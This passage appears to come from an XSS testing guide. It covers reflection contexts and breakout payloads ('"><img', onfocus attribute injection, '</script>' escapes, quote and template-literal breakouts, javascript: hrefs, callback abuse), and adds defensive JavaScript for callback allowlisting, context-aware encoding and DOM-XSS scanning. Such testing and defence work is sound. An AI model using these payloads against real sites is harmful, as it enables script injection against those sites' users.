Can the `javascript:` protocol be used? Can the `<script>` tag be escaped? Can the name of a function to execute be supplied, as in `?callback=alert(1)`?
Tags such as `<img`, `<iframe`, `<svg` or `<script` are just some of the many possible HTML tags you could use when your input lands in raw HTML. Also keep in mind Client Side Template Injection. From inside an attribute, a payload of the form `"><img [...]` first closes the attribute and the tag before opening a new one.
If `>` is encoded or deleted, then depending on the tag you could add an event attribute that executes JS code: `" autofocus onfocus=alert(1) x="`

If `"` is being encoded or deleted, then depending on which attribute your value is reflected in, and on whether you control the whole value or only part of it, you may still be able to abuse it. For example, if you control an event such as `onclick=`, you can make it execute arbitrary code when the element is clicked. Another interesting example is the `href` attribute, where the `javascript:` protocol executes arbitrary code: `href="javascript:alert(1)"`
The `accesskey` trick can also be used to abuse the vulnerability (it needs some social engineering, since the victim has to press the key combination): `" accesskey="x" onclick="alert(1)" x="`
In this context your input is reflected between the `<script> [...] </script>` tags of an HTML page, inside a `.js` file, or inside an attribute using the `javascript:` protocol.

If your code is inserted within `<script> [...] </script>` tags, even if your input is inside any kind of quotes, you can try to inject `</script>` and escape from this context. This works because the browser parses the HTML tags before the script content, so the HTML parser does not notice that the injected `</script>` tag sits inside a JavaScript string.

To break out of a JS string instead, keep the syntax valid: `'-alert(1)-'`, `';-alert(1)//`, `\';alert(1)//`
Template literals embed expressions with the `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` ``
Some endpoints accept the name of a function to execute as a parameter, for example `?callback=callbackFunc`. In that case it may be possible to trigger an alert just by sending `?callback=alert(1)`. However, it is very common that these endpoints validate the value to allow only letters, numbers, dots and underscores (`[\w\._]`). Note that a dotted path such as `obj.sales.delOrders` still passes that filter.
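The following is an added example, not code from the original page, showing on the server side why a `[\w\._]` style check like the one described above is weak and what a stricter callback validator looks like. It assumes a hypothetical application whose registered callback names (`renderOrders`, `handleSales`, `cb`) are a constructed allowlist.

```javascript
// Added example (not from the original page): server-side validation of a
// JSONP-style ?callback= parameter. Compares the weak "letters, digits, dots
// and underscores" check described in the text with a strict allowlist.

// Weak check from the text: every character must be in [\w.].
const WEAK_CALLBACK_RE = /^[\w.]+$/;

function passesWeakCheck(name) {
  return typeof name === 'string' && WEAK_CALLBACK_RE.test(name);
}

// Strict check: one bare identifier (no dots, so no property walking), short,
// and present in the set of callbacks the application actually registered.
// The allowlist below is constructed for this hypothetical application.
const REGISTERED_CALLBACKS = new Set(['renderOrders', 'handleSales', 'cb']);
const IDENTIFIER_RE = /^[A-Za-z_$][\w$]*$/;

function isAllowedCallback(name) {
  return typeof name === 'string'
    && name.length <= 64
    && IDENTIFIER_RE.test(name)
    && REGISTERED_CALLBACKS.has(name);
}

// Emit the JSONP body only for an allowed callback; refuse everything else so
// the response never becomes "<attacker-chosen expression>(...)".
function buildJsonpResponse(name, data) {
  if (!isAllowedCallback(name)) {
    return { status: 400, contentType: 'text/plain', body: 'invalid callback' };
  }
  return {
    status: 200,
    contentType: 'application/javascript',
    body: `${name}(${JSON.stringify(data)});`,
  };
}

// Constructed sample values as they might arrive in ?callback=, including the
// two shapes the text mentions (alert and a dotted property path).
const SAMPLE_CALLBACKS = ['renderOrders', 'alert', 'obj.sales.delOrders', 'x;alert(1)'];

// Side-by-side verdict of both checks for each sample.
function classify(names) {
  return names.map(n => ({ name: n, weak: passesWeakCheck(n), strict: isAllowedCallback(n) }));
}

console.table(classify(SAMPLE_CALLBACKS));
```

The point of the table is that `alert` and `obj.sales.delOrders` both pass the character-class check, while only the registered bare identifier passes the strict one; a regex on allowed characters is not the same as an allowlist of allowed names.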
There is JS code that unsafely uses data controlled by an attacker, such as `location.href`. An attacker could abuse this to execute arbitrary JS code.

When your input is reflected inside the HTML page, the first thing to check is whether you can abuse `<` to create new tags: just try to reflect that character and check whether it is HTML encoded, deleted, or reflected without changes. Only in the last case will you be able to exploit this. For these cases also keep in mind Client Side Template Injection. Note: an HTML comment can be closed using `-->` or `--!>`
When the payload relies on an `onfocus` attribute, the XSS request URL needs to end with `#` so that the page focuses that element and executes the code.
For example, with the payload placed inside an existing event handler: `<a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Go Back </a>`
The `javascript:` or `data:` protocols can be used in some places to execute arbitrary JS code; some require user interaction and some don't. The `javascript:` protocol can be used in any tag that accepts the `href` attribute and in most of the tags that accept the `src` attribute (but not `<img`).

Even if your input inside `javascript:...` is URL encoded, it will be URL decoded before it is executed. So if you need to escape from the string using a single quote and you see that it is being URL encoded, it doesn't matter: it will be interpreted as a single quote at execution time. Note that if you try to use both URL encoding and HTML encoding, in any order, on the whole payload it won't work, but you can mix them inside the payload.

Inside `javascript:` in the `src` attribute of `iframe` (at least) you can declare HTML tags to execute JS.

If you can inject into an `<a href=` tag that has the `target="_blank"` and `rel="opener"` attributes, check the referenced page on how to exploit this behavior.
Styling such as `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` makes the element cover the whole viewport. Existing stylesheet rules can be reused the same way: given `.test {display:block; color: blue; width: 100%}` and `#someid {top: 0; font-family: Tahoma;}`, the element picks them up through its selectors: `<a href="" id=someid class=test onclick=alert() a="">`
In these cases your input is reflected inside the JS code of a `.js` file, between `<script>...</script>` tags, inside HTML events that can execute JS code, or inside attributes that accept the `javascript:` protocol. If your input is inserted within `<script> [...] var input = 'reflected data' [...] </script>`, you can easily escape by closing the `<script>` tag.

If `<>` are being sanitised, you can still escape the string where your input is located and execute arbitrary JS. It is important to keep the JS syntax valid, because if there are any errors the JS code won't be executed.

Strings delimited by backticks `` ` `` are known as template literals, as they allow embedded JS expressions using the `${ ... }` syntax. Therefore, if you find that your input is reflected inside a JS string that uses backticks, you can abuse the `${ ... }` syntax to execute arbitrary JS code: `${alert(1)}`
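As an added example that is not part of the original page, the following encoders show how each reflection context discussed here (raw HTML and `<`, quoted attribute values and `"`, and JS strings including the `</script>` breakout, quote breakouts and `${ ... }`) is neutralised by encoding for the exact context the value lands in. It is run against payload shapes quoted on this page; the payload strings and the `checkEncoders` report are constructed for the demonstration.

```javascript
// Added example (not from the original page): context-aware output encoding,
// exercised against the payload shapes quoted on this page. A reflected value
// has to be encoded for the exact context it lands in: HTML text, a quoted
// HTML attribute, or a JavaScript string inside <script>.

// HTML text and quoted-attribute contexts: '<' can no longer open a tag and
// '"' can no longer close the attribute to append  autofocus onfocus=... .
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function encodeForHtml(value) {
  return String(value).replace(/[&<>"']/g, c => HTML_ESCAPES[c]);
}
const encodeForHtmlAttr = encodeForHtml; // same table; the attribute must be quoted

// JavaScript string context. HTML encoding does nothing here, because the
// script body is never HTML-decoded. Instead every character that could end
// the string, end the tag or start a template expression is emitted as \uXXXX:
// quotes, backticks, backslash, '$' (covers "${"), '<', '>' and '/' (so
// "</script>" cannot appear), control characters and U+2028/U+2029.
function encodeForJsString(value) {
  return String(value).replace(/[\\'"`$\/<>\x00-\x1f\u2028\u2029]/g, c =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Embed a value in an inline script as data, never as code.
function embedInScript(value) {
  return `<script>var input = '${encodeForJsString(value)}';</script>`;
}

// Constructed inputs built from the payload shapes on this page.
const PAYLOADS = {
  tag: '"><img src=1>',
  attrBreak: '" autofocus onfocus=alert(1) x="',
  scriptClose: '</script><img src=1>',
  stringBreak: "'-alert(1)-'",
  template: '${alert(1)}',
};

// Report whether any breakout character survives in each encoded output, and
// confirm the JS encoding is lossless (a \uXXXX-only escape is also valid JSON,
// so JSON.parse can decode it back to the original bytes).
function checkEncoders() {
  const jsInput = PAYLOADS.scriptClose + PAYLOADS.stringBreak + PAYLOADS.template;
  const js = encodeForJsString(jsInput);
  return {
    htmlHasTag: encodeForHtml(PAYLOADS.tag).includes('<'),            // false
    attrHasQuote: encodeForHtmlAttr(PAYLOADS.attrBreak).includes('"'), // false
    jsHasScriptClose: js.includes('</script'),                         // false
    jsHasQuote: js.includes("'"),                                      // false
    jsHasTemplateOpen: js.includes('${'),                              // false
    roundTrip: JSON.parse('"' + js + '"') === jsInput,                 // true
  };
}

console.log(embedInScript(PAYLOADS.scriptClose));
console.log(checkEncoders());
```

The design choice worth noting is that `encodeForJsString` does not try to recognise payloads; it escapes every character that has meaning to either the HTML parser or the JS tokenizer, which is why the `</script>`, `'` and `${` cases are all handled by the same table.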
There is JS code that unsafely uses data controlled by an attacker, such as `location.href`. An attacker could abuse this to execute arbitrary JS code.
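As an added example (not from the original page), here is a small code-review helper that flags lines where a DOM source such as `location.href` reaches a sink like `innerHTML`, with simple propagation through variables declared from a source. It generalises beyond `location.href` to other common sources and sinks; the sample script it scans is constructed, and the scan is a line-level heuristic, not a real taint analysis.

```javascript
// Added example (not from the original page): a line-level code-review helper
// that flags DOM XSS candidates, where attacker-controlled data from a source
// such as location.href reaches a sink such as innerHTML. It tracks variables
// declared from a source within the same file, but it is a heuristic for
// triage, not a parser or a real taint analysis (it cannot tell that a value
// was sanitised, and it misses flows through functions or properties).

const SOURCES = [
  'location.href', 'location.hash', 'location.search',
  'document.URL', 'document.referrer', 'window.name',
];
const SINKS = [
  'innerHTML', 'outerHTML', 'insertAdjacentHTML', 'document.write',
  'eval(', 'new Function(',
];

// "const/let/var NAME =" at the start of a line; names without '$' so the
// identifier can be dropped into a RegExp without escaping.
const DECLARATION_RE = /^(?:const|let|var)\s+([A-Za-z_]\w*)\s*=/;

function scanSource(code) {
  const tainted = new Set(); // identifiers assigned from a source or tainted value
  const findings = [];
  code.split('\n').forEach((raw, index) => {
    const line = raw.trim();
    const source = SOURCES.find(s => line.includes(s))
      || [...tainted].find(v => new RegExp('\\b' + v + '\\b').test(line))
      || null;
    const decl = line.match(DECLARATION_RE);
    if (decl && source) tainted.add(decl[1]);
    const sink = SINKS.find(k => line.includes(k));
    if (!sink) return;
    findings.push({
      lineNo: index + 1,
      sink,
      source,
      severity: source ? 'high' : 'review', // 'review': sink with no known source
      line,
    });
  });
  return findings;
}

// Constructed sample of client-side code to scan. Line 4 uses textContent,
// which is not a sink, so reflecting location.href there is not flagged.
const SAMPLE_JS = [
  "const params = new URLSearchParams(location.search);",
  "const name = params.get('name');",
  "document.getElementById('greet').innerHTML = 'Hello ' + name;",
  "document.getElementById('url').textContent = location.href;",
  "document.write('<a href=\"' + location.href + '\">back</a>');",
].join('\n');

for (const f of scanSource(SAMPLE_JS)) {
  console.log(`line ${f.lineNo} [${f.severity}] ${f.source || '?'} -> ${f.sink}: ${f.line}`);
}
```

On the constructed sample this reports line 3 (the `innerHTML` assignment fed by `name`, which came from `location.search` two declarations earlier) and line 5 (`document.write` with `location.href` inline), and stays quiet about the `textContent` assignment, which is the safe way to show a URL on the page.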
Due to the length of the explanation of DOM vulnerabilities, it was moved to a separate page.

Other schemes and cases mentioned: `mailto://`, `//x:1/`, `ws://`, `wss://`, an empty Location header, `resource://`.